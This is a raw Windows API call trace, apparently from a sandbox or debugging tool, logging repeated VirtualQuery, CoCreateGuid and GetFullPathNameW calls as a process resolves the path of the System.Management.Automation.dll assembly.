	[0321.025] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.025] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.026] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.026] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.026] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.027] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.028] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.028] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.028] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.029] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.029] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.029] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.029] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xe4e84c82, Data2=0xd3e4, Data3=0x40fe, Data4=([0]=0x81, [1]=0x83, [2]=0xcb, [3]=0x50, [4]=0x9a, [5]=0x76, [6]=0xe7, [7]=0x5e))) returned 0x0
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.035] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.036] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.036] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.037] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.037] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.038] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.038] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.038] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.038] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.038] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.039] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.039] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.039] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.039] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.040] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.040] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.040] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.040] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.040] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.041] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x61167c5b, Data2=0x7a57, Data3=0x4de0, Data4=([0]=0xa7, [1]=0xe7, [2]=0x14, [3]=0x91, [4]=0x8a, [5]=0x9e, [6]=0x1c, [7]=0x60))) returned 0x0
	[0321.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
